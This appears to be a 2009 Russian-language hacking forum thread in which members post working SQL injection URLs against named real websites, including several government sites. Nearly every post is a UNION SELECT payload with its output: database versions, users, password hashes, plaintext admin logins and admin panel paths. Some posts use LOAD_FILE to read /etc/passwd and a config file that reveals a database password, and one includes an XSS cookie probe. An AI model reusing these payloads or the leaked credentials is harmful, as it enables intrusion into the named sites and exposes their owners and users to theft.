http://www.floryon.ru/?page=details&wid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
S0ulVortex
07.03.2009, 13:16
www.htec.co.th
http://www.htec.co.th/security_%20fire.php?id=220+UNION+SELECT+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19--
version: 5.0.51a-24-log
user: fang@localhost
database: product
ещё цветочки) что то меня сегодня пробило)
http://www.florazone.ru/catalogue/?sublist=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database())--
ещё 1 сайтег)
http://www.64akalifi.ru/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9--
http://www.promholod.com/article.php?n=-1+union+select+conca t_ws(0x3a,version(),database(),user()),2,3,4--
Database Version : 5.0.45
Database name : promholod
User name : root@localhost
админ:
http://www.promholod.com/article.php?n=-1+union+select+concat_ws(0x3a,User,password,file_p riv),2,3,4+from+mys ql.user--
file_priv Y
root:1a1d79c161260718:Y
если кто расшифрует, напишите если не трудно.
Прокуратура Архангельской области
http://www.arhoblprok.atnet.ru/ru/news/show.asp?year=2009&id=86+union+select+1,2,3,4,5,6+from+news
Microsoft Access
____________________________________________
Прокуратура Московской области
http://www.mosoblproc.ru/news/?id=950+and+1=0+union+select+1,2,3,4,5,6--+&print=1
Ничего интересного T_T
Pagerank: 6
тИЦ: 2600
http://www.multiokna.ru/about/?ContentId=174&year=2009&month=02&id=-1+union+select+1,concat_ws(0x3a ,version (),database(),user()),3,4,5,6,7,8,9,10--
Database Version : 5.0.67-log
Database name : u49275
User name : u49275@10.10.223.225
Assembler
07.03.2009, 17:13
http://nautlib.ru/
PR: 5
Тиц: 70
Версия: 5.0.27-log
База данных: nautlib
Юзверь: root@localhost
http://nautlib.ru/auth.php?g=-54%20union%20select%201--
Админка: http://nautlib.ru/admin
Логин: joe
Пароль: $H$9We0hhRJHUh1BvNDil/V30fYgLKvjs1
mysql.user
file_priv=y
spherics
07.03.2009, 18:25
Gorev твоя территория ведения боевых действий -)
PageRank = 6
http://www.romanianwriters.ro/book.php?id=57+union+select+1,2,concat_ws(0x3a,ver sion(),user(),database())--
Database Version: 5.0.67-community
Database name: romanian_svc
User name: romanian_svc@localhost
PageRank = 5
http://www.greentransylvania.ro/home.php?lang=en&kozep=1&id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3--&m=8
Database Version:4.1.20
User name:greentr@localhost
Database name:greentr
http://www.oilexec.ro/jobs/jobs.php?id=987654+union+select+1,2,concat_ws(0x3a ,version(),user(),database()),4,5,6,7,8,9,10,11--
Database Version:4.1.22-standard
User name:oilexecr_oilexec@localhost
Database name:oilexecr_oilexecj
http://www.bsda.ro/index.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4--&page=fotogallery
Database Version:4.0.27-standard
User name:bsdaro_bsda@localhost
Database name:bsdaro_bsda
http://superengine.ro/demo/custom/index.php?mod=12&id=798747987+uNiOn+select+1,2,3,4,5,6,7,8,9,10,con cat_ws(0x3a,version(),user(),database()),12,13,14, 15--
Version:5.0.67-community
User:rsup3104@localhost
Database:rsup3104_superengine
PageRank = 5
http://www.hr-club.ro/page.php?id=7654554798+union+select+1,2,3,concat_w s(0x3a,version(),user(),database()),5,6,7,8--
Database Version: 5.0.67-community
Database name: hrclub_discussion
User name: hrclub_discussio@localhost
PageRank = 5
http://www.unarte.ro/unarte/newunarteTST/home.php?l=eng&p=noutati&id=68764687687+uNiOn+select+1,AES_DECRYPT(AES_ENCR YPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,Use r(),0x3a),0x71),0x71),3,4--
Database Version: 5.0.67-community
Database name: unarte_tetenica
User name: unarte_siteuna@localhost
http://www.aece.ro/archive?mode=author&id=788798746987+union+select+1,concat_ws(0x3a,vers ion(),user(),database()),3,4,5,6--
Database Version:5.0.67-log
User name:aece@localhost
Database name:aece
PageRank = 4
http://www.statiuneabaneasa.ro/en_comercial/index.php?ext=1&id=687687545876+union+select+1,2,concat_ws(0x3a,ve rsion(),user(),database()),4,5,6,7,8,9,10,11,12,13 ,14--
Database Version:5.0.32-DEBIAN_7ETCH8-LOG
User name:STATIUNEABANEASA@LOCALHOST
Database name:BANEASA
http://enshop.ro/detalii_cat_orig.php?id_prod=2191'+UNION+SELECT+1, concat_ws(0x3a,version(),database(),user()),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73, 74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90--&scat=27
Database Version: 4.1.20-log
Database name: enshop_site
User name: enshop_user@localhost
spherics
07.03.2009, 19:35
PageRank= 4
http://www.casavernescu.ro/_english-version_/special-offers/offer.php?id=798747987+union+select+1,2,3,4,5,6,7, 8,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x 3a,Database(),0x3a,User(),0x3a),0x71),0x71)--
Version:4.1.14
Database:casavernescu
User:casa@localhost
PageRank= 4
http://www.ccri.ro/news_det.php?id=9879876547987+union+select+1,2,con cat_ws(0x3a,version(),user(),database()),4,5,6,7,8 ,9,10,11,12,13,14,15--
Version:5.0.67-log
User:www_ccri_ro@68.178.254.180
Database:www_ccri_ro
PageRank = 5
http://www.unicreditleasing.ro/index.php/en/news-detail?id=80987654809+union+select+1,concat_ws(0x3 a,version(),user(),database()),3,4--
Version:5.0.22
User:cmsunicredit@localhost
Database:CMS_main
http://www.cbc.ccina.ro/Business/details.php?id=58764687+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18--
Database Version: 5.0.27-standard-log
Database name: cbc
User name: root@localhost
Читаем etc/passwd
http://www.cbc.ccina.ro/Business/details.php?id=58764687+UNION+SELECT+1,CONCAT(0x3a ,LOAD_FILE(0x2F6574632F706173737764),0x3a),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18--
PageRank = 5
http://www.esn.ro/page.php?id=0980984809809+union+select+1,2,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71),4,5,6--
Version:4.1.14-standard-log
Database:esn_ro_site
User:content@localhost
_http://www.clubinka.ru/read_extrim.php?id=-33+UNION+SELECT+1,version(),3,4,5,6,7
190 Cy
5.0.45
_ittc.ksu.ru/?id=-33+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
5.0.67
_http://kkk147.ru/catalogreport.php?id=-33+UNION+SELECT+1,2,3,pass,5,6,7,8+from+users
admin:ff963b90eac6219f9d7848a0902d87c7
_http://top-da.ru/kom.php?id=-33+UNION+SELECT+1,concat(login,0x3a,password),3,4, 5,6+from+users
_http://database.gsdog.ru/dog.php?screen=1&id=-33+UNION+SELECT+concat(name,0x3a,password),2,3,4,5 ,6+from+users
admin:natanb
_www.desertart.ru/litcoment.php?id=-33+UNION+SELECT+1,2,3,4,5,6,7,8
spherics
07.03.2009, 20:52
http://balcescuint.licee.edu.ro/romana/forum/qtf_usr.php?id=198798797987+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19--
Version:4.0.24-Max-log
User:balcescuint@localhost
Database:balcescuint
PageRank = 4
http://www.umbrela.ro/photos2.php?id=68764687685+union+select+1,2,3,4,co ncat_ws(0x3a,version(),user(),database())--&id_cat=1
Version:5.0.67-community
User:umbrela@localhost
Database:umbrela_umbrela
http://www.xservice.ru/index.php?act=&full=-1+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user()),7,8,9,10--&start=0
Database Version : 5.0.67-log
Database name : u20839
User name : u20839@10.10.153.173
-----------------------------------------------------+
http://www.extreme-centre.com/texts.php?idst=-1+union+select+concat _ws(0x3a,versi on(),database(),user()),2--
Database Version : 5.0.51a-log
Database name : expert_extreme
User name : expert_user@srv.ukrdomen
-----------------------------------------------------+
http://www.extremstyle.ua/news/index.php?SID=3&newsId=-15064+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws(0x3a,v ersion(),database(),user()),13,14,15,16,17,18,19,2 0,21,2 2,23,24,25,26,27,28,29,30,31,32,33--
Database Version : 5.0.75
Database name : sitemanager5
User name : massive@localhost
spherics
07.03.2009, 21:33
PageRank = 6
http://www.mivandevelopment.ro/news/?id=79879874798754+union+select+AES_DECRYPT(AES_EN CRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,U ser(),0x3a),0x71),0x71),2,3,4,5,6--&q=
Version:4.1.15-Debian_0.dotdeb.4
User:mivan_new
Database:apachewrite@localhost
http://www.mivandevelopment.ro/news/?id=79879874798754+union+select+AES_DECRYPT(AES_EN CRYPT(CONCAT(0x3a,password,0x3a,User,0x3a),0x71),0 x71),2,3,4,5,6+from+mysql.user--&q=
*AAC09BE938D859D93D26F7E7C4844A15880B8E8B : root
*B6FE003F99A7E953A539F94EF9EFE137F9F086EC : debian-sys-maint
*2D01933AFA9BC6191222D409BE06E8D8DF23F70E : tibus
*E90330B50A5ACA6DC2098465963448E500F4CED0 : mivanadmin
*8831151B2C3F5101E9E1FC4AC969C77D72D734E0 : apachewrite
35b08e8d332766ad : apachewrite:
http://www.gastromedia.ro/indexen.php?cat=stirieven&id=7987479798798+union+select+1,concat_ws(0x3a,ver sion(),user(),database())--&lan=stiri_en&lang=en
Version:5.0.58
User:balint@localhost
Database:boroinfo_guest
http://www.cdtransport.ro/rezervare_en.php?id=876554446876+union+select+1,2, 3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),data base()),11,12,13,14,15--
Version:5.0.67-community-log
User:trans@localhost
Database:trans_transport
Assembler
07.03.2009, 22:17
http://it-daily.ru
PR: 6
Тиц: 650
Версия: 4.0.27-log
База данных: it-daily
Юзверь: it-daily@localhost
http://it-daily.ru/AlgoNetGetNews.action.php?ID=1%20union%20select%20 1,2,version()--
S0ulVortex
08.03.2009, 01:17
www.lisa-lane.com
http://www.lisa-lane.com/news.php?ax=v&n=6&id=6&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
Version: 4.1.22-standard
User: lisalane_user@localhost
Database: lisalane_cms
-----------------------------------------------------------
www.pcilending.com
http://www.pcilending.com/news.php?ax=v&n=9&id=9&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
Version: 4.1.22-standard-log
User: pcilendi_admin@localhost
Database: pcilendi_cms
erihtoney
08.03.2009, 02:31
http://timur.jakarta.go.id/v4/?mod=node&s=static&id=-238+union+select+1,2,3,group_concat(users_name,0x3 a,users_password),5,6,7,8,9,10,11,12,13+from+gs_us ers--
admin: e41b1098902db436e121f9800b9d62ac
webmaster :b4df7d053c98bd34e8a5dd1a0495f8b7
Admin panel:
administrator/
bapeko/administrator/
yankes/administrator/
perpumda/administrator/
abangnone/administrator/
pariwisata/administrator/
indag/administrator/
pkk/administrator/
kpti/administrator/
kukm/administrator/
jatinegara/administrator/
jatinegara/template/
URL:
http://timur.jakarta.go.id
http://bapeko.timur.jakarta.go.id
PS:Website resmi kota administrasi jakarta timur
Официальный сайт администрации города Джакарта
Столица Индонезии - город Джакарта
-m0rgan-
08.03.2009, 04:41
http://www.boulangerietimmerman.fr/fr/news/news_view.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3,4,5,6--
юзер/версия/бд:
5.0.70:timmermanUsr@localhost:timmermanDB
_http://sexicq.ru/topic.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7--
version():5.1.22-rc-community
user():sexic@localhost
database():sexic
_http://www.sexbox.ru/index.php?mod=shop&op=view&id=9999999+union+select+1,2,3,4,5,concat_ws(0x3a,v ersion(),user(),database()),7,8,9,0,11,12,13,14,15 ,16,17,18,19,20,21,22,23--
version():4.1.20-lk-log
user():sexbru_sbx@localhost
database():sexbru_sbx
_http://spravka.properm.ru/company.php?id=-75829+union+select+version(),USER(),version(),vers ion(),version(),version(),version(),version(),vers ion(),version()--
version():5.0.32-Debian_7etch8-log
user():properm@localhost
database():spravka
_http://kirovka.ru/info/pages.php?city=351&show=firm&id=-1497+union+select+concat_ws(0x3a,version(),user(), database())--
5.0.32-Debian_7etch5-log:kctW+j&.[;AU0g/d@localhost:info
_http://www.search-goods.ru/site/?action=show&id=-1344+union+select+concat_ws(0x3a,version(),user(), database()),2--
version():5.0.67-percona-highperf-b7-log
USER():settarget@localhost
basedata():settarget_settarget
_http://www.ucm.es/info/uin/noticias_detalles.php?id=1+and+substring(@@version ,1,1)=5--&User_Session=6acbfc84e5af7664dd896559c389334b
-m0rgan-
08.03.2009, 05:31
http://www.mada-tourisme-durable.org/en/theme.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(), user(),database()),4,5--
юзер/версия/бд:
5.0.68-log:entreprigo2mef@10.0.63.89:entreprigo2mef
mailbrush
08.03.2009, 10:37
http://www.dermis.ru/main.phtml?did=-999999999'+union+select+1,2/*
user():database():version()
dermis@localhost:dermis:4.1.11
Вывод в <title>. Юзаем конверт либо хекс(анхекс())
Assembler
08.03.2009, 10:58
http://www.aomo.ru/blank.php?id=-1836%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,concat_ws(0x3a,login,passwd),50%20from%20 user_c%20limit%201,1--
5.0.23
-m0rgan-
08.03.2009, 11:12
http://www.colasbelgium.be/colas/NL/GrDRHBeroep2.php?IDM=-1+union+all+select+0,1,2,3,concat_ws(0x3a,version( ),user(),database()),5,6--
юзер/версия/бд:
4.1.21-standard-log:fxmuncbb_colasb@localhost:fxmuncbb_colas
http://www.jobbank.ro/jobseekers/job_view.php?job_id=-7548+union+select+1,2,version(),database(),user(), 6,7,8,9,10,11,12,13,14
Database Version: 5.0.67-community
Database name: jobbank_jobbank
User name: jobbank_jobbank@localhost
-m0rgan-
08.03.2009, 12:06
http://www.campingduinoord.nl/havenloods/index.php?num=-1+union+all+select+0,1,2,3,concat_ws(0x3a,version( ),user(),database()),5,6,7--
юзер/версия/бд:
5.0.67-community:campingd_@localhost:campingd_havenloods
http://www.ior.ro/produse/index.php?kCtg=8&ID=-13+union+select+1,2,3,4,convert(concat_ws(0x3a,ver sion(),database(),user())+using+latin1),6,7,8,9,10/*
Database Version: 4.1.11-Debian_4sarge7-log
Database name: dbior
User name: ior@localhost
http://www.diabetes.ee/seltsid/jogeva/?lk=-29145+union+select+1,2,table_name,4,5,6,7,8,9,10,1 1,12,13,14+from+information_schema.tables--
5.0.67
таблица админов - tabSeltsiAdmin
PR: 5
http://www.personal-s.ru/news/?action=news&do=view&object_id=-1+union+select+concat_ ws(0x3a,version (),database(),user()),2,3--
Database Version : 5.0.67
Database name : personal-s
User name : root@localhost
читаем /etc/passwd:
# $FreeBSD: src/etc/master.passwd,v 1.40
2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie
&:/root:/bin/csh toor:*:0:0:Bourne-again
Superuser:/root: daemon:*:1:1:Owner of many system
processes:/root:/usr/sbin/nologin operator:*:2:5:System
&:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and
Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:
/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:
/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr
/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:
/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share
/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell
Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool
/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool
/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:
/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-
user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin
/nologin _dhcp:*:65:65:dhcp programs:/var/empty:
/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var
/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin
/nologin www:*:80:80:World Wide Web
Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:
/usr/sbin/nologin techsupport:*:100:100:Technical
support group:/home/techsupport:/bin/sh
squid:*:1001:1001:Squid proxy-caching web server's
user:/nonexistent:/sbin/nologin clamav:*:106:106:Clam
Antivirus:/nonexistent:/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:
/sbin/nologin v_kalinnikova:*:100:102:Email user:/home
/v_kalinnikova:/sbin/nologin office:*:101:102:Email
user:/home/office:/sbin/nologin
i_androsova:*:102:102:Email user:/home/i_androsova:
/sbin/nologin n_blagodatskaya:*:103:102:Email
user:/home/n_blagodatskaya:/sbin/nologin
i_gorlova:*:104:102:Email user:/home/i_gorlova:
/sbin/nologin p_reberka:*:105:102:Email user:/home
/p_reberka:/sbin/nologin
y_mitrophanova:*:106:102:Email user:/home
/y_mitrophanova:/sbin/nologin bnv:*:107:102:Email
user:/home/bnv:/sbin/nologin rpv:*:108:102:Email
user:/home/rpv:/sbin/nologin
k_tishenina:*:109:102:Email user:/home/k_tishenina:
/sbin/nologin oas:*:110:102:Email user:/home/hpa:/sbin
/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:
/sbin/nologin backup:*:111:101:BackUp user:/var/Samba
/BackUp:/sbin/nologin a_markova:*:112:102:Email
user:/home/a_markova:/sbin/nologin
a_morokova:*:113:102:Email user:/home/a_morokova:
/sbin/nologin kmv:*:114:102:Email user:/home/omv:/sbin
/nologin ask:*:115:102:Email user:/home/ask:/sbin
/nologin bilenko:*:116:102:Email user:/home/ask:/sbin
/nologin e_kruglova:*:117:102:Email user:/home
/e_kruglova:/sbin/nologin gmp:*:118:102:Email
user:/home/gmp:/sbin/nologin mea:*:118:102:Email
user:/home/mea:/sbin/nologin konkurs:*:118:102:Email
user:/home/konkurs:/sbin/nologin
mailrobot:*:119:102:Email user:/home/mailrobot:
/sbin/nologin
оййй на чтой-то мы тут наткнулись :rolleyes: :
http://www.personal-s.ru/news/?action=news&do=view&object_id=-1+union+select+LOAD_ FILE(0x2f686f6d652f74656368737570706f72742f2e68747 06173737764), 2,3--
admin:NriRkf2e6iPFA
spherics
08.03.2009, 18:08
http://www.nipne.ro/events/seminar/index.php?id=876875433456646876+union+select+1,2,3 ,4,concat_ws(0x3a,version(),user(),database()),6,7 ,8,9,10,11--
Database Version: 4.1.22
Database name: ifin-hh
User name: admusr@localhost
http://www.nipne.ro/events/seminar/index.php?id=876875433456646876+union+select+1,2,3 ,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+fro m+mysql.user--
root : 556eba5e26cdd0e1
http://www.dentex.ro/index.php?id=90779888490+union+select+1,concat_ws( 0x3a,version(),user(),database()),3--
Version:4.1.22-standard-log
User:bluetech@localhost
Database:bluetech_prod
http://www.laguna-showroom.ro/stire.php?lang=en&id=7987987646987987+union+select+1,2,3,4,5,6,7,8,9 ,10,concat_ws(0x3a,version(),user(),database()),12 ,13,14,15,16--&name=Ceramica-Ribesalbes---colors-for-tiles-with-personality-!
Version:5.0.67-community
User:bravo@localhost
Database:bravo
http://www.imobilenoi.ro/?action=articles&id=798756544347987/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database()),3,4--
Version:5.0.67-community
User:imobilen_imnoi@localhost
Database:imobilen_imnoi
http://www.lasvegasphilharmonic.com/about/bio.php?ID=-35'+union+select+1,2,3,4,5/*&type=M
5.0.27
http://www.nlr.net/about/bio.php?id=-7+union+select+1,2,3,4,5,6,7,8/*
5.0.45-log
http://www.mymissouri32.com/people/bio.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
5.0.45
http://www.youngstartup.com/corporate09/bio.php?id=-1068+union+select+1,2,3,3/*
4.0.20-standard
http://www.dunyakan.com/bio.php?id=-2+union+select+1,2/*&lang=en
4.1.21-standard-log
http://www.kmiz.com/people/bio.php?id=-51+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,d atabase(),16/*
5.0.45
Assembler
08.03.2009, 18:21
http://www.sweetfactory.ru
Версия: 4.1.22-log
http://www.sweetfactory.ru/shok.php?gp=-39%20union%20select%201,2,3,4,5,6--
spherics
08.03.2009, 18:55
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71)--
Database Version: 4.1.10
Database name: ordinances
User name: root@192.168.2.2
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Password,0x3a,User,0x 3a),0x71),0x71)+from+mysql.user+limit+1,1--
773a716368a9f480 : phpBB
6b05b5b330c85e6e : bplt
5be75b377fe12423 : squidalyser
1ef20cb70c8499bb : dbuser:
*527B4FF4B7421D9786914C59FF8E9382BAF1978C : root
Читаем /etc/passwd
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F6574632 F706173737764),0x3a),0x71),0x71)--
Читаем /usr/home/web/www.naga.gov.ph/includes/config.php
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F7573722 F686F6D652F7765622F7777772E6E6167612E676F762E70682 F696E636C756465732F636F6E6669672E706870),0x3a),0x7 1),0x71)--
// define our database connection
define('MYSQL_ASSOC', 'dune');
define('DB_SERVER', 'www.naga.gov.ph');
define('DB_SERVER_USERNAME', 'root');
define('DB_SERVER_PASSWORD', 'Genesis11');
//define('DB_DATABASE', 'web_apps');
И так далее..... =)
Assembler
08.03.2009, 19:16
http://www.eurocups.ru/champs/table.php?id=1231234%20union%20select%201,version( ),3%20--
Database Version: 5.0.26-log
Database name: eurocupru_main
User name: eurocupru_main@localhost
spherics
08.03.2009, 19:34
http://www.anqing.gov.cn/include/web_view.php?id=9798654334547987+union+select+1,2, concat_ws(0x3a,version(),user(),database()),4,5,6, 7,8,9,10,11--
Version:4.0.16-standard
User:webuser@localhost
Database:web
http://www.qaia.gov.jo/inner_links_en.php?id=979864544546547987+union+sel ect+1,2,3,concat_ws(0x3a,version(),user(),database ()),5,6,7,8,9,10--
5.0.67-community-log
qaiagov_aliauser@localhost
qaiagov_alia
S0ulVortex
08.03.2009, 19:44
www.fresnomag.com
http://www.fresnomag.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
Version: 4.1.22-standard-log
User: fresnoma_admin@localhost
Database: fresnoma_cms
mailbrush
08.03.2009, 22:03
http://www.comsult.co.za/newnews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,u ser(),database(),version()),6
user():database():version()
comsult@ns1.pluto.co.za:comsult:5.0.51a-community-log
http://www.comsult.co.za/newnews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,u sername,password),6+from+users
Admin User: gwalker:hayley12
Admin Panel: http://www.comsult.co.za/admin.php
XSS: http://www.comsult.co.za/admin.php?msg=<script>alert(document.cookie)</script>
PS: Смысл этой админки не понял...
Спустя 5 мин:
Уже понял. После логина можно удалять статьи =) ыЫ
-m0rgan-
08.03.2009, 22:13
http://www.saferoadsalliance.org/newsdetail.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user( ),database()),4,5,6,7--
юзер/версия/бд:
iwallis_dbread@localhost5.0.67-community-logiwallis_sra
mailbrush
08.03.2009, 22:22
SeaZone.com
PageRank = 5
http://www.seazone.com/newsNews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,u ser(),database(),version()),6,7,8,9/*
user():database():version()
seazone@DS1004.dedicated.turbodns.co.uk:seazone:4. 1.20-community-nt-log
-m0rgan-
08.03.2009, 22:26
http://braintumorfoundation.org/newsdetail.php?ID=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4--
юзер/версия/бд:
btf2@localhost5.0.67-community-ntbraintumorfoundation_org_-_maindb
http://www.intorsura.ro/evenimente/evenimente_ext.php?id=10+UNION+SELECT+1,concat_ws( 0x3a,version(),database(),user()),3,4,5,6,7--
Database Version: 5.0.67-community
Database name: intors_intorsura
User name: intors_jymmy5@localhost
http://www.intorsura.ro/admin/
jymmy5:jooti1103
-m0rgan-
08.03.2009, 23:50
http://www.radiofeyalegriapy.org/staff_id.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3--
юзер/версия/бд:
radiofe_wizard@web.hostinginternetservices.com5.0. 67-logradiofe_db
------------------------------------------------
http://www.grpa.org/news_view.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
юзер/версия/бд:
grpa@localhost5.0.45grpa
--------------------------------------------------------
The End!
zifanchuck
08.03.2009, 23:57
TOP сайтов посвященных играм компании VALVE
www.valvegames.ru
Database Version: 5.0.58-log
Database name: aresstokrat_topsite
User name: topper@localhost
http://www.valvegames.ru/kom.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
логини и пароли)))
http://www.valvegames.ru/kom.php?id=-1+union+select+1,2,concat(login,0x3a,email,0x3a,pa ssword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+use rs+limit+0,1--
Assembler
09.03.2009, 00:04
________________________
http://www.new.stavochka.com
http://www.new.stavochka.com/view.php?contentid=999999999999+union+select+1,2,3 ,4,userpassword,6,7,8,9,10+from+users%20limit%201, 1--
-m0rgan-
09.03.2009, 00:14
http://equip-pro.org/faq2.php?id=-1+union+all+select+0,convert(concat_ws(0x3a,user,p assword)+using+latin1)+from+mysql.user--
логин/пасс:
admin:*E00A80AB6F24E7B362C395180BC14EB843C0789F
pma_2TxiSCaHx2xl:*3AD2033B55FAC4748FE2246AA65D9D7E C4D9C697
horde:*14E7135B569C268C3501DF6BD7EC03B4F9AA7122
dummy:*3089891C3381828B4B10B733E3E4BE5804FD7B1B
ddcadmin:*E00A80AB6F24E7B362C395180BC14EB843C0789F
relay:*1E87B9A814EAB0E332A49A17A41E784A073A9A84
http://equip-pro.org/faq2.php?id=-1+union+all+select+0,convert(concat_ws(version(),u ser(),database())+using+latin1)+from+mysql.user--
юзер/версия/бд:
dummy@localhost5.0.18levelone
http://www.turismmontan.3x.ro/ofertaloc.php?loc_id=-3+UNION+SELECT+concat_ws(0x3a,version(),database() ,useR()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8--
Version : 5.0.51-LOG
Database : TURISMMONTAN
User : TURISMMONTAN@LOCALHOST
zifanchuck
09.03.2009, 00:21
Подарок мужчине - домашняя мини пивоварня модель 2000 - 2006 от "Beer Machine"
www.beermachine.ru
Database Version: 5.0.67-log
Database name: u28651
User name: u28651@10.10.153.174
http://www.beermachine.ru/katalog.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4--
-m0rgan-
09.03.2009, 00:23
http://setmana2008.balearsfaciencia.org/participant.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4--
юзер/версия/бд:
balearsfaciencia@localhost5.0.32-Debian_7etch8-logsetmana2008
zifanchuck
09.03.2009, 00:50
"ЯБЛОКО" : Челябинск. :: Официальный сайт регионального отделения партии
www.chel.yabloko.ru
Database Version: 5.0.32-Debian_7etch8-log
Database name: chel
User name: chel@localhost
http://www.chel.yabloko.ru/organization/history/print.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,version(),database%20(),user()),12,13,14,15,16,17 ,18,19--
-m0rgan-
09.03.2009, 00:58
http://web-site-development.biz/product.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4--
юзер/версия/бд:
wsd@localhost4.1.25-logwsd_site
Parserian
09.03.2009, 02:39
http://www.gateway.uz
пр5, тиц 20
http://www.gateway.uz/index.php?article=-1 UNION SELECT 1, concat_ws(0x3A3A, user(),database(),version())
uzdg@localhost::uzdg::5.0.32-Dotdeb_1.dotdeb.1-log
http://www.gateway.uz/index.php?article=-1 UNION SELECT 1, group_concat( concat_ws( 0x3A3A, TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME ) SEPARATOR 0x3C62723E ) FROM information_schema.COLUMNS GROUP BY TABLE_SCHEMA, TABLE_NAME
доступ в information_schema, смотрите таблички наздоровье.
M.W.N.N.
09.03.2009, 09:06
http://www.barretos.sp.gov.br/link.php?xvar=visualizar_noticia.php&xid=2775+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
version(): 5.0.32-Debian_7etch8-log
database(): prefeitura
user(): prefeitura@localhost
